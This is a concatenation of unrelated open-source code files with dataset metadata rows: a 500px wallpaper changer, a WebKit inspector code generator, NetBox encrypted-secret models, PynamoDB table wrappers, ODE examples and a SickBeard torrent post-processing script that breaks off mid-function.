try:
timerInterval = float(txtinterval.toPlainText())
except ValueError:
timerInterval = 300 # fail-safe value
if timerStatus: # True if checked
global killThreadEvent
killThreadEvent = threading.Event()
threading.Thread(target=newWallpaperLoop, args=(timerInterval, killThreadEvent), daemon=True).start()
else:
killThreadEvent.set() # setting this event will request the thread to stop
def main():
app = QApplication(sys.argv)
ui = QTGui() # instantiate our GUI class wherein the form actually displays
sys.exit(app.exec_()) # wait while GUI not closed
def newWallpaperInNewThread():
threading.Thread(target=newWallpaper, daemon=True).start()
def newWallpaper():
global savepath # globalise for memory, for deleting the image next time this method executes
try:
os.remove(savepath) # delete the last downloaded image, the wallpaper will not be affected
print("Deleted ",savepath)
except Exception as ex:
print("Exception occurred while doing os.remove()\nException : ", ex)
try:
firstURL = "https://500px.com/popular"
firstResponse = requests.get(firstURL)
cookie = firstResponse.cookies["_hpx1"]
content = firstResponse.content
soup = BeautifulSoup(content, "lxml")
found = soup.find("meta", attrs={"name": "csrf-token"})
csrfToken = found["content"]
randomPage = random.randint(1, 1000)
apiURL = "https://api.500px.com/v1/photos"
secondResponse = requests.get(apiURL, params={"rpp": 50, "feature": "popular", "image_size": 1080, "sort": "rating",
"exclude": "Nude", "formats": "jpeg", "page": randomPage},
headers={"Cookie": "_hpx1=" + cookie, "X-CSRF-Token": csrfToken})
# 500px API Reference:
# https://github.com/500px/api-documentation/blob/master/endpoints/photo/GET_photos.md
jsonResponse = secondResponse.json()
randomIndex = random.randint(0, 49)
randomImageLink = jsonResponse["photos"][randomIndex]["images"][0]["url"]
randomImageName = jsonResponse["photos"][randomIndex]["name"]
print(randomImageLink)
print(randomImageName)
label.setText(randomImageName)
randomImageName = base64.urlsafe_b64encode(randomImageName.encode("UTF-8")).decode(
"UTF-8") # base64 encoding turns any imagename into a filesystem friendly name
download = requests.get(randomImageLink, stream=True) # stream=True is required to access download.raw data
except Exception as ex:
print("Something went wrong while downloading, no internet?\nException : ",ex)
return
try:
savepath = tempfile.gettempdir() + "\\" + randomImageName + ".jpg"
with open(savepath, "wb") as file:
shutil.copyfileobj(download.raw, file)
SPI_SETDESKWALLPAPER = 20
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, savepath,
0) # ANSI version of the API doesn't seem to work here, thus the W
except Exception as ex:
print("Something went wrong while saving image.\nException : ", ex)
return
def newWallpaperLoop(timerinterval, stop_event):
while not stop_event.is_set():
newWallpaperInNewThread()
print("Spawning now!")
time.sleep(timerinterval)
print("stopped")
main()
| mit | -8,944,200,180,740,626,000 | 37.215116 | 124 | 0.630689 | false | 3.979351 | false | false | false |
teamfx/openjfx-8u-dev-rt | modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_alternate_backend_dispatcher_header.py | 1 | 4331 | #!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from cpp_generator_templates import CppGeneratorTemplates as CppTemplates
log = logging.getLogger('global')
class CppAlternateBackendDispatcherHeaderGenerator(CppGenerator):
def __init__(self, *args, **kwargs):
CppGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sAlternateBackendDispatchers.h' % self.protocol_name()
def generate_output(self):
template_args = {
'includes': self._generate_secondary_header_includes()
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPrelude).substitute(None, **template_args))
sections.append('\n'.join(filter(None, map(self._generate_handler_declarations_for_domain, domains))))
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPostlude).substitute(None, **template_args))
return '\n\n'.join(sections)
# Private methods.
def _generate_secondary_header_includes(self):
target_framework_name = self.model().framework.name
header_includes = [
([target_framework_name], (target_framework_name, "%sProtocolTypes.h" % self.protocol_name())),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorFrontendRouter.h")),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorBackendDispatcher.h")),
]
return '\n'.join(self.generate_includes_from_entries(header_includes))
def _generate_handler_declarations_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not len(commands):
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_declaration_for_command(command))
handler_args = {
'domainName': domain.domain_name,
'commandDeclarations': '\n'.join(command_declarations),
}
return self.wrap_with_guard_for_domain(domain, Template(CppTemplates.AlternateBackendDispatcherHeaderDomainHandlerInterfaceDeclaration).substitute(None, **handler_args))
def _generate_handler_declaration_for_command(self, command):
lines = []
parameters = ['long callId']
for _parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(_parameter), _parameter.parameter_name))
command_args = {
'commandName': command.command_name,
'parameters': ', '.join(parameters),
}
lines.append(' virtual void %(commandName)s(%(parameters)s) = 0;' % command_args)
return '\n'.join(lines)
| gpl-2.0 | -8,505,268,923,321,353,000 | 42.747475 | 177 | 0.704918 | false | 4.283877 | false | false | false |
digitalocean/netbox | netbox/secrets/models.py | 1 | 14739 | import os
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util import strxor
from django.conf import settings
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_bytes
from taggit.managers import TaggableManager
from extras.models import ChangeLoggedModel, CustomFieldModel, TaggedItem
from extras.utils import extras_features
from utilities.querysets import RestrictedQuerySet
from .exceptions import InvalidKey
from .hashers import SecretValidationHasher
from .querysets import UserKeyQuerySet
from .utils import encrypt_master_key, decrypt_master_key, generate_random_key
__all__ = (
'Secret',
'SecretRole',
'SessionKey',
'UserKey',
)
class UserKey(models.Model):
"""
A UserKey stores a user's personal RSA (public) encryption key, which is used to generate their unique encrypted
copy of the master encryption key. The encrypted instance of the master key can be decrypted only with the user's
matching (private) decryption key.
"""
created = models.DateField(
auto_now_add=True
)
last_updated = models.DateTimeField(
auto_now=True
)
user = models.OneToOneField(
to=User,
on_delete=models.CASCADE,
related_name='user_key',
editable=False
)
public_key = models.TextField(
verbose_name='RSA public key'
)
master_key_cipher = models.BinaryField(
max_length=512,
blank=True,
null=True,
editable=False
)
objects = UserKeyQuerySet.as_manager()
class Meta:
ordering = ['user__username']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Store the initial public_key and master_key_cipher to check for changes on save().
self.__initial_public_key = self.public_key
self.__initial_master_key_cipher = self.master_key_cipher
def __str__(self):
return self.user.username
def clean(self):
super().clean()
if self.public_key:
# Validate the public key format
try:
pubkey = RSA.import_key(self.public_key)
except ValueError:
raise ValidationError({
'public_key': "Invalid RSA key format."
})
except Exception:
raise ValidationError("Something went wrong while trying to save your key. Please ensure that you're "
"uploading a valid RSA public key in PEM format (no SSH/PGP).")
# Validate the public key length
pubkey_length = pubkey.size_in_bits()
if pubkey_length < settings.SECRETS_MIN_PUBKEY_SIZE:
raise ValidationError({
'public_key': "Insufficient key length. Keys must be at least {} bits long.".format(
settings.SECRETS_MIN_PUBKEY_SIZE
)
})
# We can't use keys bigger than our master_key_cipher field can hold
if pubkey_length > 4096:
raise ValidationError({
'public_key': "Public key size ({}) is too large. Maximum key size is 4096 bits.".format(
pubkey_length
)
})
def save(self, *args, **kwargs):
# Check whether public_key has been modified. If so, nullify the initial master_key_cipher.
if self.__initial_master_key_cipher and self.public_key != self.__initial_public_key:
self.master_key_cipher = None
# If no other active UserKeys exist, generate a new master key and use it to activate this UserKey.
if self.is_filled() and not self.is_active() and not UserKey.objects.active().count():
master_key = generate_random_key()
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
# If Secrets exist and this is the last active UserKey, prevent its deletion. Deleting the last UserKey will
# result in the master key being destroyed and rendering all Secrets inaccessible.
if Secret.objects.count() and [uk.pk for uk in UserKey.objects.active()] == [self.pk]:
raise Exception("Cannot delete the last active UserKey when Secrets exist! This would render all secrets "
"inaccessible.")
super().delete(*args, **kwargs)
def is_filled(self):
"""
Returns True if the UserKey has been filled with a public RSA key.
"""
return bool(self.public_key)
is_filled.boolean = True
def is_active(self):
"""
Returns True if the UserKey has been populated with an encrypted copy of the master key.
"""
return self.master_key_cipher is not None
is_active.boolean = True
def get_master_key(self, private_key):
"""
Given the User's private key, return the encrypted master key.
"""
if not self.is_active:
raise ValueError("Unable to retrieve master key: UserKey is inactive.")
try:
return decrypt_master_key(force_bytes(self.master_key_cipher), private_key)
except ValueError:
return None
def activate(self, master_key):
"""
Activate the UserKey by saving an encrypted copy of the master key to the database.
"""
if not self.public_key:
raise Exception("Cannot activate UserKey: Its public key must be filled first.")
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
self.save()
class SessionKey(models.Model):
"""
A SessionKey stores a User's temporary key to be used for the encryption and decryption of secrets.
"""
userkey = models.OneToOneField(
to='secrets.UserKey',
on_delete=models.CASCADE,
related_name='session_key',
editable=False
)
cipher = models.BinaryField(
max_length=512,
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
created = models.DateTimeField(
auto_now_add=True
)
key = None
class Meta:
ordering = ['userkey__user__username']
def __str__(self):
return self.userkey.user.username
def save(self, master_key=None, *args, **kwargs):
if master_key is None:
raise Exception("The master key must be provided to save a session key.")
# Generate a random 256-bit session key if one is not already defined
if self.key is None:
self.key = generate_random_key()
# Generate SHA256 hash using Django's built-in password hashing mechanism
self.hash = make_password(self.key)
# Encrypt master key using the session key
self.cipher = strxor.strxor(self.key, master_key)
super().save(*args, **kwargs)
def get_master_key(self, session_key):
# Validate the provided session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid session key")
# Decrypt master key using provided session key
master_key = strxor.strxor(session_key, bytes(self.cipher))
return master_key
def get_session_key(self, master_key):
# Recover session key using the master key
session_key = strxor.strxor(master_key, bytes(self.cipher))
# Validate the recovered session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid master key")
return session_key
class SecretRole(ChangeLoggedModel):
"""
A SecretRole represents an arbitrary functional classification of Secrets. For example, a user might define roles
such as "Login Credentials" or "SNMP Communities."
"""
name = models.CharField(
max_length=100,
unique=True
)
slug = models.SlugField(
max_length=100,
unique=True
)
description = models.CharField(
max_length=200,
blank=True,
)
objects = RestrictedQuerySet.as_manager()
csv_headers = ['name', 'slug', 'description']
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return "{}?role={}".format(reverse('secrets:secret_list'), self.slug)
def to_csv(self):
return (
self.name,
self.slug,
self.description,
)
@extras_features('custom_fields', 'custom_links', 'export_templates', 'webhooks')
class Secret(ChangeLoggedModel, CustomFieldModel):
"""
A Secret stores an AES256-encrypted copy of sensitive data, such as passwords or secret keys. An irreversible
SHA-256 hash is stored along with the ciphertext for validation upon decryption. Each Secret is assigned to exactly
one NetBox object, and objects may have multiple Secrets associated with them. A name can optionally be defined
along with the ciphertext; this string is stored as plain text in the database.
A Secret can be up to 65,535 bytes (64KB - 1B) in length. Each secret string will be padded with random data to
a minimum of 64 bytes during encryption in order to protect short strings from ciphertext analysis.
"""
assigned_object_type = models.ForeignKey(
to=ContentType,
on_delete=models.PROTECT
)
assigned_object_id = models.PositiveIntegerField()
assigned_object = GenericForeignKey(
ct_field='assigned_object_type',
fk_field='assigned_object_id'
)
role = models.ForeignKey(
to='secrets.SecretRole',
on_delete=models.PROTECT,
related_name='secrets'
)
name = models.CharField(
max_length=100,
blank=True
)
ciphertext = models.BinaryField(
max_length=65568, # 128-bit IV + 16-bit pad length + 65535B secret + 15B padding
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
tags = TaggableManager(through=TaggedItem)
objects = RestrictedQuerySet.as_manager()
plaintext = None
csv_headers = ['assigned_object_type', 'assigned_object_id', 'role', 'name', 'plaintext']
class Meta:
ordering = ('role', 'name', 'pk')
unique_together = ('assigned_object_type', 'assigned_object_id', 'role', 'name')
def __init__(self, *args, **kwargs):
self.plaintext = kwargs.pop('plaintext', None)
super().__init__(*args, **kwargs)
def __str__(self):
return self.name or 'Secret'
def get_absolute_url(self):
return reverse('secrets:secret', args=[self.pk])
def to_csv(self):
return (
f'{self.assigned_object_type.app_label}.{self.assigned_object_type.model}',
self.assigned_object_id,
self.role,
self.name,
self.plaintext or '',
)
def _pad(self, s):
"""
Prepend the length of the plaintext (2B) and pad with garbage to a multiple of 16B (minimum of 64B).
+--+--------+-------------------------------------------+
|LL|MySecret|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|
+--+--------+-------------------------------------------+
"""
s = s.encode('utf8')
if len(s) > 65535:
raise ValueError("Maximum plaintext size is 65535 bytes.")
# Minimum ciphertext size is 64 bytes to conceal the length of short secrets.
if len(s) <= 62:
pad_length = 62 - len(s)
elif (len(s) + 2) % 16:
pad_length = 16 - ((len(s) + 2) % 16)
else:
pad_length = 0
header = bytes([len(s) >> 8]) + bytes([len(s) % 256])
return header + s + os.urandom(pad_length)
def _unpad(self, s):
"""
Consume the first two bytes of s as a plaintext length indicator and return only that many bytes as the
plaintext.
"""
if isinstance(s[0], str):
plaintext_length = (ord(s[0]) << 8) + ord(s[1])
else:
plaintext_length = (s[0] << 8) + s[1]
return s[2:plaintext_length + 2].decode('utf8')
def encrypt(self, secret_key):
"""
Generate a random initialization vector (IV) for AES. Pad the plaintext to the AES block size (16 bytes) and
encrypt. Prepend the IV for use in decryption. Finally, record the SHA256 hash of the plaintext for validation
upon decryption.
"""
if self.plaintext is None:
raise Exception("Must unlock or set plaintext before locking.")
# Pad and encrypt plaintext
iv = os.urandom(16)
aes = AES.new(secret_key, AES.MODE_CFB, iv)
self.ciphertext = iv + aes.encrypt(self._pad(self.plaintext))
# Generate SHA256 using Django's built-in password hashing mechanism
self.hash = make_password(self.plaintext, hasher=SecretValidationHasher())
self.plaintext = None
def decrypt(self, secret_key):
"""
Consume the first 16 bytes of self.ciphertext as the AES initialization vector (IV). The remainder is decrypted
using the IV and the provided secret key. Padding is then removed to reveal the plaintext. Finally, validate the
decrypted plaintext value against the stored hash.
"""
if self.plaintext is not None:
return
if not self.ciphertext:
raise Exception("Must define ciphertext before unlocking.")
# Decrypt ciphertext and remove padding
iv = bytes(self.ciphertext[0:16])
ciphertext = bytes(self.ciphertext[16:])
aes = AES.new(secret_key, AES.MODE_CFB, iv)
plaintext = self._unpad(aes.decrypt(ciphertext))
# Verify decrypted plaintext against hash
if not self.validate(plaintext):
raise ValueError("Invalid key or ciphertext!")
self.plaintext = plaintext
def validate(self, plaintext):
"""
Validate that a given plaintext matches the stored hash.
"""
if not self.hash:
raise Exception("Hash has not been generated for this secret.")
return check_password(plaintext, self.hash, preferred=SecretValidationHasher())
| apache-2.0 | -4,090,337,497,129,936,000 | 33.68 | 120 | 0.619581 | false | 4.29458 | false | false | false |
5nizza/party-elli | synthesis/model_k_searcher.py | 1 | 1140 | import logging
from helpers.logging_helper import log_entrance
from interfaces.LTS import LTS
from interfaces.solver_interface import SolverInterface
from synthesis.coreach_encoder import CoreachEncoder
from synthesis.smt_format import make_check_sat
@log_entrance()
def search(min_size:int, max_size:int,
max_k:int,
encoder:CoreachEncoder,
solver:SolverInterface) -> LTS or None:
solver += encoder.encode_headers()
solver += encoder.encode_initialization()
last_size = 0
for size in range(min_size, max_size+1):
k = min(max_k, size//3 + 1)
logging.info('searching a model: size=%i, k=%i'%(size,k))
solver += encoder.encode_run_graph(range(size)[last_size:])
solver.push() # >>>>>>>>> push
solver += encoder.encode_model_bound(range(size))
solver += make_check_sat(encoder.encode_assumption_forbid_k(max_k - k))
solver += encoder.encode_get_model_values()
ret = solver.solve()
if ret:
return encoder.parse_model(ret)
solver.pop() # <<<<<<<<<< pop
last_size = size
return None
| mit | 5,410,120,537,181,015,000 | 30.666667 | 79 | 0.635965 | false | 3.619048 | false | false | false |
qdonnellan/django_emailoto | emailoto/config.py | 1 | 1065 | from django.conf import settings
class EmailOtoConfig(object):
def __init__(self):
"""Read from settings.py and apply defaults (or raise exceptions.)"""
self.redis_host = settings.EMAILOTO.get('redis_host', 'localhost')
self.redis_port = settings.EMAILOTO.get('redis_port', 6379)
self.redis_db = settings.EMAILOTO.get('redis_db', 2)
self.expiration = settings.EMAILOTO.get('expiration', 60 * 10)
self.ratelimit = settings.EMAILOTO.get('ratelimit', '5/m')
class ImproperlyConfigured(Exception):
pass
@property
def mailgun_api_key(self):
return self.get_or_raise('mailgun_api_key')
@property
def mailgun_api_url(self):
return self.get_or_raise('mailgun_api_url')
def get_or_raise(self, setting_key):
value = settings.EMAILOTO.get(setting_key)
if not value:
raise self.ImproperlyConfigured(
'No "%s" found in settings.py configuration.' % (setting_key)
)
return value
CONFIG = EmailOtoConfig()
| mit | -8,496,874,060,864,339,000 | 29.428571 | 77 | 0.630986 | false | 3.75 | true | false | false |
ragupta-git/ImcSdk | imcsdk/mometa/equipment/EquipmentSystemIOController.py | 1 | 2755 | """This module contains the general information for EquipmentSystemIOController ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentSystemIOControllerConsts:
ADMIN_POWER_CMC_REBOOT = "cmc-reboot"
ADMIN_POWER_CMC_RESET_DEFAULT = "cmc-reset-default"
ADMIN_POWER_POLICY = "policy"
class EquipmentSystemIOController(ManagedObject):
"""This is EquipmentSystemIOController class."""
consts = EquipmentSystemIOControllerConsts()
naming_props = set([u'id'])
mo_meta = {
"modular": MoMeta("EquipmentSystemIOController", "equipmentSystemIOController", "slot-[id]", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'equipmentChassis'], [u'commEpIpmiLan', u'equipmentSharedIOModule', u'mgmtController', u'siocResetReason'], ["Get", "Set"])
}
prop_meta = {
"modular": {
"admin_power": MoPropertyMeta("admin_power", "adminPower", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["cmc-reboot", "cmc-reset-default", "policy"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version2013e, MoPropertyMeta.NAMING, None, None, None, None, [], ["1-2"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
},
}
prop_map = {
"modular": {
"adminPower": "admin_power",
"childAction": "child_action",
"description": "description",
"dn": "dn",
"id": "id",
"rn": "rn",
"status": "status",
},
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.admin_power = None
self.child_action = None
self.description = None
self.status = None
ManagedObject.__init__(self, "EquipmentSystemIOController", parent_mo_or_dn, **kwargs)
| apache-2.0 | -862,146,203,412,341,400 | 43.435484 | 309 | 0.625408 | false | 3.532051 | false | false | false |
aerosara/thesis | notebooks_archive_10112014/pycse Examples.py | 1 | 2176 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=3>
# Example from pycse 1
# <codecell>
# copied from http://kitchingroup.cheme.cmu.edu/blog/tag/events/
from pycse import odelay
import matplotlib.pyplot as plt
import numpy as np
def ode(Y,x):
y1, y2 = Y
dy1dx = y2
dy2dx = -y1
return [dy1dx, dy2dx]
def event1(Y, x):
y1, y2 = Y
value = y2 - (-1.0)
isterminal = True
direction = 0
return value, isterminal, direction
def event2(Y, x):
dy1dx, dy2dx = ode(Y,x)
value = dy1dx - 0.0
isterminal = False
direction = -1 # derivative is decreasing towards a maximum
return value, isterminal, direction
Y0 = [2.0, 1.0]
xspan = np.linspace(0, 5)
X, Y, XE, YE, IE = odelay(ode, Y0, xspan, events=[event1, event2])
plt.plot(X, Y)
for ie,xe,ye in zip(IE, XE, YE):
if ie == 1: #this is the second event
y1,y2 = ye
plt.plot(xe, y1, 'ro')
plt.legend(['$y_1$', '$y_2$'], loc='best')
#plt.savefig('images/odelay-mult-eq.png')
plt.show()
# <headingcell level=3>
# Example from pycse 2
# <codecell>
# copied from: http://kitchingroup.cheme.cmu.edu/pycse/pycse.html#sec-10-1-8
# 10.1.8 Stopping the integration of an ODE at some condition
from pycse import *
import numpy as np
k = 0.23
Ca0 = 2.3
def dCadt(Ca, t):
return -k * Ca**2
def stop(Ca, t):
isterminal = True
direction = 0
value = 1.0 - Ca
return value, isterminal, direction
tspan = np.linspace(0.0, 10.0)
t, CA, TE, YE, IE = odelay(dCadt, Ca0, tspan, events=[stop])
print 'At t = {0:1.2f} seconds the concentration of A is {1:1.2f} mol/L.'.format(t[-1], float(CA[-1]))
# <headingcell level=3>
# fsolve example
# <codecell>
from math import cos
def func(x):
return x + 2*cos(x) # finds where this is zero
def func2(x):
out = [x[0]*cos(x[1]) - 4]
out.append(x[1]*x[0] - x[1] - 5)
return out # finds where both elements of this array are zero
from scipy.optimize import fsolve
x0 = fsolve(func, 0.3) # initial guess
print x0
print func(x0)
#-1.02986652932
x02 = fsolve(func2, [1, 1]) # initial guesses
print x02
print func2(x02)
#[ 6.50409711 0.90841421]
| mit | 5,269,726,309,331,049,000 | 18.781818 | 102 | 0.628676 | false | 2.498278 | false | false | false |
mtsgrd/PynamoDB2 | pynamodb/connection/table.py | 1 | 7391 | """
PynamoDB Connection classes
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from .base import Connection
class TableConnection(object):
"""
A higher level abstraction over botocore
"""
def __init__(self, table_name, region=None, host=None):
self._hash_keyname = None
self._range_keyname = None
self.table_name = table_name
self.connection = Connection(region=region, host=host)
def delete_item(self, hash_key,
range_key=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the DeleteItem operation and returns the result
"""
return self.connection.delete_item(
self.table_name,
hash_key,
range_key=range_key,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def update_item(self,
hash_key,
range_key=None,
attribute_updates=None,
expected=None,
return_consumed_capacity=None,
return_item_collection_metrics=None,
return_values=None
):
"""
Performs the UpdateItem operation
"""
return self.connection.update_item(
self.table_name,
hash_key,
range_key=range_key,
attribute_updates=attribute_updates,
expected=expected,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics,
return_values=return_values)
def put_item(self, hash_key,
range_key=None,
attributes=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the PutItem operation and returns the result
"""
return self.connection.put_item(
self.table_name,
hash_key,
range_key=range_key,
attributes=attributes,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_write_item(self,
put_items=None,
delete_items=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the batch_write_item operation
"""
return self.connection.batch_write_item(
self.table_name,
put_items=put_items,
delete_items=delete_items,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_get_item(self, keys, consistent_read=None, return_consumed_capacity=None, attributes_to_get=None):
"""
Performs the batch get item operation
"""
return self.connection.batch_get_item(
self.table_name,
keys,
consistent_read=consistent_read,
return_consumed_capacity=return_consumed_capacity,
attributes_to_get=attributes_to_get)
def get_item(self, hash_key, range_key=None, consistent_read=False, attributes_to_get=None):
"""
Performs the GetItem operation and returns the result
"""
return self.connection.get_item(
self.table_name,
hash_key,
range_key=range_key,
consistent_read=consistent_read,
attributes_to_get=attributes_to_get)
def scan(self,
attributes_to_get=None,
limit=None,
scan_filter=None,
return_consumed_capacity=None,
segment=None,
total_segments=None,
exclusive_start_key=None):
"""
Performs the scan operation
"""
return self.connection.scan(
self.table_name,
attributes_to_get=attributes_to_get,
limit=limit,
scan_filter=scan_filter,
return_consumed_capacity=return_consumed_capacity,
segment=segment,
total_segments=total_segments,
exclusive_start_key=exclusive_start_key)
def query(self,
hash_key,
attributes_to_get=None,
consistent_read=False,
exclusive_start_key=None,
index_name=None,
key_conditions=None,
limit=None,
return_consumed_capacity=None,
scan_index_forward=None,
select=None
):
"""
Performs the Query operation and returns the result
"""
return self.connection.query(
self.table_name,
hash_key,
attributes_to_get=attributes_to_get,
consistent_read=consistent_read,
exclusive_start_key=exclusive_start_key,
index_name=index_name,
key_conditions=key_conditions,
limit=limit,
return_consumed_capacity=return_consumed_capacity,
scan_index_forward=scan_index_forward,
select=select)
def describe_table(self):
"""
Performs the DescribeTable operation and returns the result
"""
return self.connection.describe_table(self.table_name)
def delete_table(self):
"""
Performs the DeleteTable operation and returns the result
"""
return self.connection.delete_table(self.table_name)
def update_table(self,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_index_updates=None):
"""
Performs the UpdateTable operation and returns the result
"""
return self.connection.update_table(
self.table_name,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_index_updates=global_secondary_index_updates)
def create_table(self,
attribute_definitions=None,
key_schema=None,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_indexes=None,
local_secondary_indexes=None):
"""
Performs the CreateTable operation and returns the result
"""
return self.connection.create_table(
self.table_name,
attribute_definitions=attribute_definitions,
key_schema=key_schema,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes
)
| mit | 4,248,419,250,073,645,600 | 34.533654 | 112 | 0.557705 | false | 4.722684 | false | false | false |
BeegorMif/HTPC-Manager | autoProcessTV/mediaToSickbeard.py | 1 | 6654 | #!/usr/bin/env python2
import sys
import os
import time
import ConfigParser
import logging
sickbeardPath = os.path.split(os.path.split(sys.argv[0])[0])[0]
sys.path.append(os.path.join( sickbeardPath, 'lib'))
sys.path.append(sickbeardPath)
configFilename = os.path.join(sickbeardPath, "config.ini")
import requests
config = ConfigParser.ConfigParser()
try:
fp = open(configFilename, "r")
config.readfp(fp)
fp.close()
except IOError, e:
print "Could not find/read Sickbeard config.ini: " + str(e)
print 'Possibly wrong mediaToSickbeard.py location. Ensure the file is in the autoProcessTV subdir of your Sickbeard installation'
time.sleep(3)
sys.exit(1)
scriptlogger = logging.getLogger('mediaToSickbeard')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s MEDIATOSICKBEARD :: %(message)s', '%b-%d %H:%M:%S')
# Get the log dir setting from SB config
logdirsetting = config.get("General", "log_dir") if config.get("General", "log_dir") else 'Logs'
# put the log dir inside the SickBeard dir, unless an absolute path
logdir = os.path.normpath(os.path.join(sickbeardPath, logdirsetting))
logfile = os.path.join(logdir, 'sickbeard.log')
try:
handler = logging.FileHandler(logfile)
except:
print 'Unable to open/create the log file at ' + logfile
time.sleep(3)
sys.exit()
handler.setFormatter(formatter)
scriptlogger.addHandler(handler)
scriptlogger.setLevel(logging.DEBUG)
def utorrent():
# print 'Calling utorrent'
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - is this being called from uTorrent?')
print "No folder supplied - is this being called from uTorrent?"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
def transmission():
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
return (dirName, nzbName)
def deluge():
if len(sys.argv) < 4:
scriptlogger.error('No folder supplied - is this being called from Deluge?')
print "No folder supplied - is this being called from Deluge?"
time.sleep(3)
sys.exit()
dirName = sys.argv[3]
nzbName = sys.argv[2]
return (dirName, nzbName)
def blackhole():
if None != os.getenv('TR_TORRENT_DIR'):
scriptlogger.debug('Processing script triggered by Transmission')
print "Processing script triggered by Transmission"
